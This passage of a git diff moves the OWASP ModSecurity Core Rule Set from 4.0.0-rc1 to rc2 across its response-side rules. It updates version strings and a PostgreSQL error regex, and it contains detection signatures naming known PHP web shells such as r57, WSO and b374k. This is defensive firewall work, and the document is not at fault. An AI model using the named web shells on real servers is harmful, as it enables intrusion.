     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'"
-SecRule RESPONSE_BODY "@rx (?i)P(?:ostgreSQL(?: query failed:|.{1,20}ERROR)|G::[a-z]*Error)|pg_(?:query|exec)\(\) \[:|Warning.{1,20}\bpg_.*|valid PostgreSQL result|Npgsql\.|Supplied argument is not a valid PostgreSQL .*? resource|Unable to connect to PostgreSQL server" \
+SecRule RESPONSE_BODY "@rx (?i)P(?:ostgreSQL(?: query failed:|.{1,20}ERROR)|G::[a-z]*Error)|pg_(?:query|exec)\(\) \[:|Warning.{1,20}\bpg_.*|valid PostgreSQL result|Npgsql\.|Supplied argument is not a valid PostgreSQL .*? resource|(?:Unable to connect to PostgreSQL serv|invalid input syntax for integ)er" \
     "id:951240,\
     phase:4,\
     block,\
@@ -285,7 +285,7 @@ SecRule RESPONSE_BODY "@rx (?i)P(?:ostgreSQL(?: query failed:|.{1,20}ERROR)|G::[
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/118/116/54',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'"
@@ -304,7 +304,7 @@ SecRule RESPONSE_BODY "@rx (?i)(?:Warning.*sqlite_.*|Warning.*SQLite3::|SQLite/J
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/118/116/54',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'"
@@ -323,7 +323,7 @@ SecRule RESPONSE_BODY "@rx (?i)(?:Sybase message:|Warning.{2,20}sybase|Sybase.*S
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/118/116/54',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'"
diff --git a/rules/@owasp_crs/RESPONSE-952-DATA-LEAKAGES-JAVA.conf b/rules/@owasp_crs/RESPONSE-952-DATA-LEAKAGES-JAVA.conf
index d65a623..5120e40 100644
--- a/rules/@owasp_crs/RESPONSE-952-DATA-LEAKAGES-JAVA.conf
+++ b/rules/@owasp_crs/RESPONSE-952-DATA-LEAKAGES-JAVA.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.4.0.0-rc1
+# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2022 Core Rule Set project. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -25,7 +25,7 @@ SecRule RESPONSE_BODY "@pmFromFile java-code-leakages.data" \
     tag:'OWASP_CRS',\
     tag:'capec/1000/118/116',\
     tag:'PCI/6.5.6',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'ERROR',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'"
 SecRule RESPONSE_BODY "@pmFromFile java-errors.data" \
@@ -44,7 +44,7 @@ SecRule RESPONSE_BODY "@pmFromFile java-errors.data" \
     tag:'OWASP_CRS',\
     tag:'capec/1000/118/116',\
     tag:'PCI/6.5.6',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'ERROR',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'"
 SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:952013,phase:3,pass,nolog,skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA"
diff --git a/rules/@owasp_crs/RESPONSE-953-DATA-LEAKAGES-PHP.conf b/rules/@owasp_crs/RESPONSE-953-DATA-LEAKAGES-PHP.conf
index ec35301..ff36337 100644
--- a/rules/@owasp_crs/RESPONSE-953-DATA-LEAKAGES-PHP.conf
+++ b/rules/@owasp_crs/RESPONSE-953-DATA-LEAKAGES-PHP.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.4.0.0-rc1
+# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2022 Core Rule Set project. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -25,7 +25,7 @@ SecRule RESPONSE_BODY "@pmFromFile php-errors.data" \
     tag:'OWASP_CRS',\
     tag:'capec/1000/118/116',\
     tag:'PCI/6.5.6',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'ERROR',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'"
 SecRule RESPONSE_BODY "@rx (?:\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\$_(?:(?:pos|ge)t|session))\b" \
@@ -44,7 +44,7 @@ SecRule RESPONSE_BODY "@rx (?:\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scan
     tag:'OWASP_CRS',\
     tag:'capec/1000/118/116',\
     tag:'PCI/6.5.6',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'ERROR',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'"
 SecRule RESPONSE_BODY "@rx (?i)<\?(?:=|php)?\s+" \
@@ -63,7 +63,7 @@ SecRule RESPONSE_BODY "@rx (?i)<\?(?:=|php)?\s+" \
     tag:'OWASP_CRS',\
     tag:'capec/1000/118/116',\
     tag:'PCI/6.5.6',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'ERROR',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'"
 SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:953013,phase:3,pass,nolog,skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP"
@@ -84,7 +84,7 @@ SecRule RESPONSE_BODY "@pmFromFile php-errors-pl2.data" \
     tag:'OWASP_CRS',\
     tag:'capec/1000/118/116',\
     tag:'PCI/6.5.6',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'ERROR',\
     setvar:'tx.outbound_anomaly_score_pl2=+%{tx.error_anomaly_score}'"
 SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:953015,phase:3,pass,nolog,skipAfter:END-RESPONSE-953-DATA-LEAKAGES-PHP"
diff --git a/rules/@owasp_crs/RESPONSE-954-DATA-LEAKAGES-IIS.conf b/rules/@owasp_crs/RESPONSE-954-DATA-LEAKAGES-IIS.conf
index fa4afc8..9e6f0d5 100644
--- a/rules/@owasp_crs/RESPONSE-954-DATA-LEAKAGES-IIS.conf
+++ b/rules/@owasp_crs/RESPONSE-954-DATA-LEAKAGES-IIS.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.4.0.0-rc1
+# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2022 Core Rule Set project. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -25,7 +25,7 @@ SecRule RESPONSE_BODY "@rx [a-z]:\x5cinetpub\b" \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/118/116',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'ERROR',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'"
 SecRule RESPONSE_BODY "@rx (?:Microsoft OLE DB Provider for SQL Server(?:</font>.{1,20}?error '800(?:04005|40e31)'.{1,40}?Timeout expired| \(0x80040e31\)<br>Timeout expired<br>)|<h1>internal server error</h1>.*?<h2>part of the server has crashed or it has a configuration error\.</h2>|cannot connect to the server: timed out)" \
@@ -45,7 +45,7 @@ SecRule RESPONSE_BODY "@rx (?:Microsoft OLE DB Provider for SQL Server(?:</font>
     tag:'PCI/6.5.6',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/118/116',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'ERROR',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'"
 SecRule RESPONSE_BODY "@pmFromFile iis-errors.data" \
@@ -65,7 +65,7 @@ SecRule RESPONSE_BODY "@pmFromFile iis-errors.data" \
     tag:'OWASP_CRS',\
     tag:'capec/1000/118/116',\
     tag:'PCI/6.5.6',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'ERROR',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'"
 SecRule RESPONSE_STATUS "!@rx ^404$" \
@@ -85,7 +85,7 @@ SecRule RESPONSE_STATUS "!@rx ^404$" \
     tag:'OWASP_CRS',\
     tag:'capec/1000/118/116',\
     tag:'PCI/6.5.6',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'ERROR',\
     chain"
     SecRule RESPONSE_BODY "@rx \bServer Error in.{0,50}?\bApplication\b" \
diff --git a/rules/@owasp_crs/RESPONSE-955-WEB-SHELLS.conf b/rules/@owasp_crs/RESPONSE-955-WEB-SHELLS.conf
index 2231e90..59845a6 100644
--- a/rules/@owasp_crs/RESPONSE-955-WEB-SHELLS.conf
+++ b/rules/@owasp_crs/RESPONSE-955-WEB-SHELLS.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.4.0.0-rc1
+# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2
 # Copyright (c) 2006-2020 Trustwave and contributors. (not) All rights reserved.
-# Copyright (c) 2021-2022 Core Rule Set project. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -23,7 +23,7 @@ SecRule RESPONSE_BODY "@pmFromFile web-shells-php.data" \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule RESPONSE_BODY "@rx (<title>r57 Shell Version [0-9.]+</title>|<title>r57 shell</title>)" \
@@ -40,7 +40,7 @@ SecRule RESPONSE_BODY "@rx (<title>r57 Shell Version [0-9.]+</title>|<title>r57
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule RESPONSE_BODY "@rx ^<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title>.*? - WSO [0-9.]+</title>" \
@@ -57,7 +57,7 @@ SecRule RESPONSE_BODY "@rx ^<html><head><meta http-equiv='Content-Type' content=
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule RESPONSE_BODY "@rx B4TM4N SH3LL</title>.*<meta name='author' content='k4mpr3t'/>" \
@@ -74,7 +74,7 @@ SecRule RESPONSE_BODY "@rx B4TM4N SH3LL</title>.*<meta name='author' content='k4
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule RESPONSE_BODY "@rx <title>Mini Shell</title>.*Developed By LameHacker" \
@@ -91,7 +91,7 @@ SecRule RESPONSE_BODY "@rx <title>Mini Shell</title>.*Developed By LameHacker" \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule RESPONSE_BODY "@rx <title>\.:: .* ~ Ashiyane V [0-9.]+ ::\.</title>" \
@@ -108,7 +108,7 @@ SecRule RESPONSE_BODY "@rx <title>\.:: .* ~ Ashiyane V [0-9.]+ ::\.</title>" \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule RESPONSE_BODY "@rx <title>Symlink_Sa [0-9.]+</title>" \
@@ -125,7 +125,7 @@ SecRule RESPONSE_BODY "@rx <title>Symlink_Sa [0-9.]+</title>" \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule RESPONSE_BODY "@rx <title>CasuS [0-9.]+ by MafiABoY</title>" \
@@ -142,7 +142,7 @@ SecRule RESPONSE_BODY "@rx <title>CasuS [0-9.]+ by MafiABoY</title>" \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule RESPONSE_BODY "@rx ^<html>\r\n<head>\r\n<title>GRP WebShell [0-9.]+ " \
@@ -159,7 +159,7 @@ SecRule RESPONSE_BODY "@rx ^<html>\r\n<head>\r\n<title>GRP WebShell [0-9.]+ " \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule RESPONSE_BODY "@rx <small>NGHshell [0-9.]+ by Cr4sh</body></html>\n$" \
@@ -176,7 +176,7 @@ SecRule RESPONSE_BODY "@rx <small>NGHshell [0-9.]+ by Cr4sh</body></html>\n$" \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule RESPONSE_BODY "@rx <title>SimAttacker - (?:Version|Vrsion) : [0-9.]+ - " \
@@ -193,7 +193,7 @@ SecRule RESPONSE_BODY "@rx <title>SimAttacker - (?:Version|Vrsion) : [0-9.]+ - "
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule RESPONSE_BODY "@rx ^<!DOCTYPE html>\n<html>\n<!-- By Artyum .*<title>Web Shell</title>" \
@@ -210,7 +210,7 @@ SecRule RESPONSE_BODY "@rx ^<!DOCTYPE html>\n<html>\n<!-- By Artyum .*<title>Web
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule RESPONSE_BODY "@rx <title>lama's'hell v. [0-9.]+</title>" \
@@ -227,7 +227,7 @@ SecRule RESPONSE_BODY "@rx <title>lama's'hell v. [0-9.]+</title>" \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule RESPONSE_BODY "@rx ^ *<html>\n[ ]+<head>\n[ ]+<title>lostDC - " \
@@ -244,7 +244,7 @@ SecRule RESPONSE_BODY "@rx ^ *<html>\n[ ]+<head>\n[ ]+<title>lostDC - " \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule RESPONSE_BODY "@rx ^<title>PHP Web Shell</title>\r\n<html>\r\n<body>\r\n    <!-- Replaces command with Base64-encoded Data -->" \
@@ -261,7 +261,7 @@ SecRule RESPONSE_BODY "@rx ^<title>PHP Web Shell</title>\r\n<html>\r\n<body>\r\n
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule RESPONSE_BODY "@rx ^<html>\n<head>\n<div align=\"left\"><font size=\"1\">Input command :</font></div>\n<form name=\"cmd\" method=\"POST\" enctype=\"multipart/form-data\">" \
@@ -278,7 +278,7 @@ SecRule RESPONSE_BODY "@rx ^<html>\n<head>\n<div align=\"left\"><font size=\"1\"
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule RESPONSE_BODY "@rx ^<html>\n<head>\n<title>Ru24PostWebShell - " \
@@ -295,7 +295,7 @@ SecRule RESPONSE_BODY "@rx ^<html>\n<head>\n<title>Ru24PostWebShell - " \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule RESPONSE_BODY "@rx <title>s72 Shell v[0-9.]+ Codinf by Cr@zy_King</title>" \
@@ -312,7 +312,7 @@ SecRule RESPONSE_BODY "@rx <title>s72 Shell v[0-9.]+ Codinf by Cr@zy_King</title
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule RESPONSE_BODY "@rx ^<html>\r\n<head>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\">\r\n<title>PhpSpy Ver [0-9]+</title>" \
@@ -329,7 +329,7 @@ SecRule RESPONSE_BODY "@rx ^<html>\r\n<head>\r\n<meta http-equiv=\"Content-Type\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule RESPONSE_BODY "@rx ^ <html>\n\n<head>\n\n<title>g00nshell v[0-9.]+ " \
@@ -346,7 +346,7 @@ SecRule RESPONSE_BODY "@rx ^ <html>\n\n<head>\n\n<title>g00nshell v[0-9.]+ " \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule RESPONSE_BODY "@contains <title>punkholicshell</title>" \
@@ -363,7 +363,7 @@ SecRule RESPONSE_BODY "@contains <title>punkholicshell</title>" \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule RESPONSE_BODY "@rx ^<html>\n      <head>\n             <title>azrail [0-9.]+ by C-W-M</title>" \
@@ -380,7 +380,7 @@ SecRule RESPONSE_BODY "@rx ^<html>\n      <head>\n             <title>azrail [0-
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule RESPONSE_BODY "@rx >SmEvK_PaThAn Shell v[0-9]+ coded by <a href=" \
@@ -397,7 +397,7 @@ SecRule RESPONSE_BODY "@rx >SmEvK_PaThAn Shell v[0-9]+ coded by <a href=" \
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule RESPONSE_BODY "@rx ^<html>\n<title>.*? ~ Shell I</title>\n<head>\n<style>" \
@@ -414,7 +414,7 @@ SecRule RESPONSE_BODY "@rx ^<html>\n<title>.*? ~ Shell I</title>\n<head>\n<style
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule RESPONSE_BODY "@rx ^ <html><head><title>:: b374k m1n1 [0-9.]+ ::</title>" \
@@ -431,7 +431,7 @@ SecRule RESPONSE_BODY "@rx ^ <html><head><title>:: b374k m1n1 [0-9.]+ ::</title>
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:955013,phase:3,pass,nolog,skipAfter:END-RESPONSE-955-WEB-SHELLS"
@@ -450,7 +450,7 @@ SecRule RESPONSE_BODY "@contains <h1 style=\"margin-bottom: 0\">webadmin.php</h1
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/225/122/17/650',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.outbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
 SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:955015,phase:3,pass,nolog,skipAfter:END-RESPONSE-955-WEB-SHELLS"
diff --git a/rules/@owasp_crs/RESPONSE-959-BLOCKING-EVALUATION.conf b/rules/@owasp_crs/RESPONSE-959-BLOCKING-EVALUATION.conf
index 804c166..4b329e1 100644
--- a/rules/@owasp_crs/RESPONSE-959-BLOCKING-EVALUATION.conf
+++ b/rules/@owasp_crs/RESPONSE-959-BLOCKING-EVALUATION.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.4.0.0-rc1
+# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2022 Core Rule Set project. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -141,7 +141,7 @@ SecRule TX:BLOCKING_OUTBOUND_ANOMALY_SCORE "@ge %{tx.outbound_anomaly_score_thre
     t:none,\
     msg:'Outbound Anomaly Score Exceeded in phase 3 (Total Score: %{tx.blocking_outbound_anomaly_score})',\
     tag:'anomaly-evaluation',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     chain"
     SecRule TX:EARLY_BLOCKING "@eq 1"
 SecRule TX:BLOCKING_OUTBOUND_ANOMALY_SCORE "@ge %{tx.outbound_anomaly_score_threshold}" \
@@ -151,7 +151,7 @@ SecRule TX:BLOCKING_OUTBOUND_ANOMALY_SCORE "@ge %{tx.outbound_anomaly_score_thre
     t:none,\
     msg:'Outbound Anomaly Score Exceeded (Total Score: %{tx.blocking_outbound_anomaly_score})',\
     tag:'anomaly-evaluation',\
-    ver:'OWASP_CRS/4.0.0-rc1'"
+    ver:'OWASP_CRS/4.0.0-rc2'"
 SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:959011,phase:3,pass,nolog,skipAfter:END-RESPONSE-959-BLOCKING-EVALUATION"
 SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:959012,phase:4,pass,nolog,skipAfter:END-RESPONSE-959-BLOCKING-EVALUATION"
 SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:959013,phase:3,pass,nolog,skipAfter:END-RESPONSE-959-BLOCKING-EVALUATION"
diff --git a/rules/@owasp_crs/RESPONSE-980-CORRELATION.conf b/rules/@owasp_crs/RESPONSE-980-CORRELATION.conf
index d28c797..01e9150 100644
--- a/rules/@owasp_crs/RESPONSE-980-CORRELATION.conf
+++ b/rules/@owasp_crs/RESPONSE-980-CORRELATION.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.4.0.0-rc1
+# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2022 Core Rule Set project. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -14,7 +14,7 @@ SecAction \
     t:none,\
     nolog,\
     noauditlog,\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
